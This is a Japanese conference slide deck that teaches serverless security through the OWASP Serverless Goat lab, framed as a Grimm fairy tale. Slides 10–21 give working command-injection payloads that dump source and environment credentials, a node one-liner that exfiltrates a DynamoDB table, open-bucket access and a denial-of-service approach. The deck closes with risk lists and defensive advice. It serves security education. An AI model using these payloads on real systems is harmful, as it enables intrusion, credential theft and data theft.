20191013 JAWS-UG広島で話しました。サーバーレスセキュリティの内容をグリム童話「狼と七匹の子山羊」をベースにお話させてもらいました。

2. 自己紹介
@Typhon666_death
仕事：大手SIにてインフラ・セキュリティエンジニア/
コンサルタント/アナリスト/営業
主な活動コミュニティ：
OWASP Japan Promotion Teamメンバー
Security-JAWS 運営メンバー
X-Tech JAWS 運営メンバー
レトロゲーム勉強会運営メンバー
お好み焼き検定 初級
過去の発表資料など
https://www.slideshare.net/Typhon666_death

3. 実行委員長やりました。
裏側でどんなことをやったか、どんなマネジメントをしてたか、DevRelJapan/Conferenceやその
他勉強会で喋ったりしました。
動画はこちら
https://devrel.tokyo/japan-2019/speakers/yoshie/
JAWS DAYS 2019 やりました

4. この物語は本家グリム童話のオマージュであ
り、フィクションです。
実在の狼・子ヤギとは関係ありません。
サーバーレスxセキュリティxAWSの内容で広
島をリスペクトし、初のサーバーレスネタで
プレゼンさせていただきます。
本編

5. 狼と七匹の子山羊[グリム童話]

6. 狼と七匹の子山羊[サーバーレス童話]

7. 狼と七匹の子山羊[サーバーレス童話]

8. Information Gathering
子山羊がアクセスしたサーバーレスの管理者Webページと仮定
URLフィードのある管理者Webページの一部
アプリケーションがAWS API Gatewayを介して公開されている場合、
URLの形式は
https://{string}.execute-api.{region}.amazonaws.com/{stage}/…
HTTPレスポンスヘッダは、次のヘッダ名が含まれる可能性
x-amz-apigw-id
x-amzn-requestid
x-amzn-trace-id

9. Information Gathering
詳細なエラーメッセージを残されると、そこには機密情報が含まれている可能性があり、内容に
よってAWS Lambdaを利用したサーバーレスアプリケーションとわかることがある
document_url なしでHTTPリクエストをなげてみる。
例）https://eqfh35ixqj.execute-api.us-east-1.amazonaws.com/Prod/api/convert
このときの下記エラーから
/var/taskにアプリケーションが配置されている
exports.handler ： よくあるLambda ファンクションの名前の付け方？
（関数名はhandlerで、index.jsの内部で定義）
document_url → ドキュメントのURLを設定・参照するもの

10. Reverse Engineering The Lambda Function
関数がOSコマンドインジェクションに対して脆弱かどうかを確認
たとえば、Sleep シェルコマンドでOSコマンドインジェクションが可能か比較
URLフィードにそれぞれを実行して確認してみる
https://www.puresec.io/hubfs/document.doc → ドキュメントの変換されたテキストを返してくれる
https://www.puresec.io/hubfs/document.doc; sleep 1 # → 文字化けしたテキストを返しますが、フ
ァンクションは実行される
https://www.puresec.io/hubfs/document.doc; sleep 5000 # → Internal Server Errorのメッセージを返す
上記から、アプリケーションがdocument_url パラメーターを介したOSコマンドインジェクションに対し
て脆弱であることがわかる

11. Reverse Engineering The Lambda Function
URLフィードに以下を実行してLambdaの全容を確認してみる
https://foobar; cat /var/task/index.js # → Lambdaファンクションを丸裸

12. Reverse Engineering The Lambda Function
たとえば、以下のことがわかる。
AWS DynamoDB、node-uuidというNode.jsパッケージを使用していること
アプリケーションは、TABLE_NAME環境変数で名前が定義されているDynamoDBテーブル内
に機密ユーザー情報（IPアドレスとドキュメントURL）を保存すること
OSコマンドインジェクションの背後にある根本的な原因
- child_process.execSync()呼び出しで信頼できないユーザー入力
API呼び出しの出力はS3バケット内に格納され、その名前も環境変数内に格納されること-
BUCKET_NAME

13. Digging For Gold Inside Environment Variables
機密情報を環境変数内に暗号化されない方法で保存することはよろしくない
URLフィードに以下を実行してenvコマンドを実行し、環境変数からデータを取得
https://foobar; env #

14. Digging For Gold Inside Environment Variables
3つのIAMトークンをローカル環境に設定し、ファンクションの一時実行ロールを引き受けること
ができる
ローカルでファンクションのロールを実際に使用できることを確認

15. Exploiting Over-Privileged IAM Roles
Lambda は put()メソッドを使用して、クライアントのIPアドレスとドキュメントURL値を
DynamoDBテーブルに挿入している
DynamoDBに与えるべき最小ロールは dynamodb:PutItem 。しかし、過剰に与えていたら？
OSコマンドインジェクションの弱点を悪用して、dynamodb:Scan パーミッションを悪用して
DynamoDBテーブルからデータを盗み出す
URLフィードに以下を実行
https://; node -e 'const AWS = require("aws-sdk"); (async () => {console.log(await new
AWS.DynamoDB.DocumentClient().scan({TableName:
process.env.TABLE_NAME}).promise());})();'

16. 一部抜粋
Exploiting Over-Privileged IAM Roles

17. Abusing Insecure Cloud Configurations
サーバーレスアプリケーションにて使用されるS3バケットの名前はすでにわかっている。
http://aws-serverless-repository-serverless-goat-bucket-{string}.s3-website-
{region}.amazonaws.com/{uuid}
BUCKET_NAME=aws-serverless-repository-serverless-goat-bucket-1mgh0m1xs6ppx
以下のようにして、アクセスしてみる。
https://aws-serverless-repository-serverless-goat-bucket-1mgh0m1xs6ppx.s3.amazonaws.com

18. Abusing Insecure Cloud Configurations
Keyの値をuuidにして、入
力すると、他人のドキュメ
ント内容が判明する。

19. Finding Known Vulnerabilities In Open Source Packages
Lambdaファンクションのソースコードから、node-uuid というnpmパッケージへの依存関係が含
まれていることがわかった
URLフォームに以下を入力
https://www.puresec.io/hubfs/document.doc; ls #
アプリの開発者は誤って、 package.json の内容を同梱してしまっていることが判明

20. Finding Known Vulnerabilities In Open Source Packages
URLフォームに以下を入力
https://www.puresec.io/hubfs/document.doc; cat package.json #
バージョンがとても古い
これの脆弱性を悪用することを考えたり。

21. Denial of Service
Lambdaファンクションの同時実行数に着目して、DoSにすることも可能
例えば、以下のような実行可能なAPI URLをdocument_urlの後、URLエンコードで結合したURL
を用意し、これを同時に実行する。これを同時実行させるスクリプトを組む。
https://i92uw6vw73.execute-api.us-east-
1.amazonaws.com/Prod/api/convert?document_url=https%3A%2F%2Fi92uw6vw73.execute-
api.us-east-1.amazonaws.com%2FProd%2Fapi%2Fconvert%3Fdocument_url...

22. 狼と七匹の子山羊[サーバーレス童話]

24. Tool Introduction
サーバーレスの脆弱性と戯れることができるツールを紹介

25. OWASPの一つのプロジェクトとして、Puresec(現在はPaloAltoNetworksが買収)にて開発・
寄贈された。
脆弱性やそれらを悪用する方法、および各問題を修正する方法について学ぶことができる。
サーバーレスの課題とベストプラクティスでの修正方法を説明したドキュメントも有
AWS Serverless Application Repositoryを介してデプロイできるAWS SAMアプリケーシ
ョンとしてパッケージ。
AWS SARでOWASPと検索して、ワンクリックデプロイが可能。
自身でハンズオンすれば、一時間から二時間くらいで考えながら、遊べる。
OWASP Serverless Goat

26. Puresec社にて、調査・作成されたサーバーレスアーキテクチャにおけるセキュリティの重大事項Top10
SAS-1: Function Event Data Injection
SAS-2: Broken Authentication
SAS-3: Insecure Serverless Deployment Configuration
SAS-4: Over-Privileged Function Permissions & Role
SAS-5: Inadequate Function Monitoring and Loggin
SAS-6: Insecure 3rd Party Dependencies
SAS-7: Insecure Application Secrets Storage
SAS-8: Denial of Service & Financial Resource Exhaustion
SAS-9: Serverless Function Execution Flow Manipulation
SAS-10: Improper Exception Handling and Verbose Error Messages
Serverless architectures Security Top 10 (2018)
このうち、
1,3,4,5,6,8,10について
の体験が
Serverless Goatで可能

27. Protego社を始めとしたいくつかの企業によるプロジェクトメンバー
で作成されたサーバーレスアプリケーションのセキュリティ脆弱性の
影響について調査されたもの。
OWASP Top 10, OWASP IoT Top10同様に
有志で作成されており、上位ほど重要
OWASP Serverless Top 10 (2017)

28. SAS Top10 vs OWASP Serverless Top10
Serverless architectures Security Top 10 OWASP Serverless Top 10
SAS-1: Function Event Data Injection
(ファンクションイベントデータインジェクション)
1 A1:2017 Injection
(インジェクション)
SAS-2: Broken Authentication
(認証の不備)
2 A2:2017 Broken Authentication
(認証の不備)
SAS-3: Insecure Serverless Deployment Configuration
(安全でないサーバーレスデプロイ設定)
3 A3:2017 Sensitive Data Exposure
(機微な情報の露出)
SAS-4: Over-Privileged Function Permissions & Role
(過剰な関数の許可やロール設定)
4 A4:2017 XML External Entities (XXE)
(XML外部エンティティ参照)
SAS-5: Inadequate Function Monitoring and Logging
(不十分なモニタリングとロギングの機能)
5 A5:2017 Broken Access Control
(アクセス制御の不備)
SAS-6: Insecure 3rd Party Dependencies
(安全でないサードパーティとの依存関係)
6 A6:2017 Security Misconfiguration
(不適切なセキュリティ設定)
SAS-7: Insecure Application Secrets Storage
(安全でないアプリケーションシークレットストレージ)
7 A7:2017 Cross-Site Scripting (XSS)
(クロスサイトスクリプティング)
SAS-8: Denial of Service & Financial Resource Exhaustion
(DoS & リソース枯渇)
8 A8:2017 Insecure Deserialization
(安全でないデシリアライゼーション)
SAS-9: Serverless Function Execution Flow Manipulation
(サーバーレスファンクションの実行フローの操作)
9 A9:2017 Using Components with Known Vulnerabilities
(既知の脆弱性のあるコンポーネントの使用)
SAS-10: Improper Exception Handling and Verbose Error Messages
(不適切な例外処理と詳細なエラーメッセージ)
10 A10:2017 Insufficient Logging and Monitoring
(不十分なロギングとモニタリング)

29. Cloud Security Alliance(CSA) Israel Chapterによって作成された
ベースはPuresec開発のもので、見直された。
以下が入れ替わり
旧SAS-9: Serverless Function Execution Flow Manipulation
新SAS-9: Serverless Business Logic Manipulation (サーバーレスビジネスロジックの操作)
また以下二つが追加
SAS-11: Obsolete Functions, Cloud Resources and Event Triggers (廃れたファンクション, クラウドリソ
ース, イベントトリガー)
SAS-12: Cross-Execution Data Persistency (多重実行時のデータの永続性)
The 12 Most Critical Risks for Serverless Applications (2019)

30. サーバーレスだからといって、過信できる話ではないということを肝に命じてください
Webアプリケーションの作り方に問題があれば、サーバーレスであろうともクレデンシャル
を盗まれる可能性があるということを肝に命じてください
既知の脆弱性に対する対策は通常のWebだろうとサーバーレスだろうと対策することは一緒
サイトがセキュアに構築できてるかどうか、脆弱性診断をベンダーに依頼するのも有り
余談ですが、引用サイトの中に、SASTやDASTやRASPの有用性も書いてますので、一読さ
れたし
ぜひ、セキュアなサーバーレスライフに取り組んでみてください
Conclusion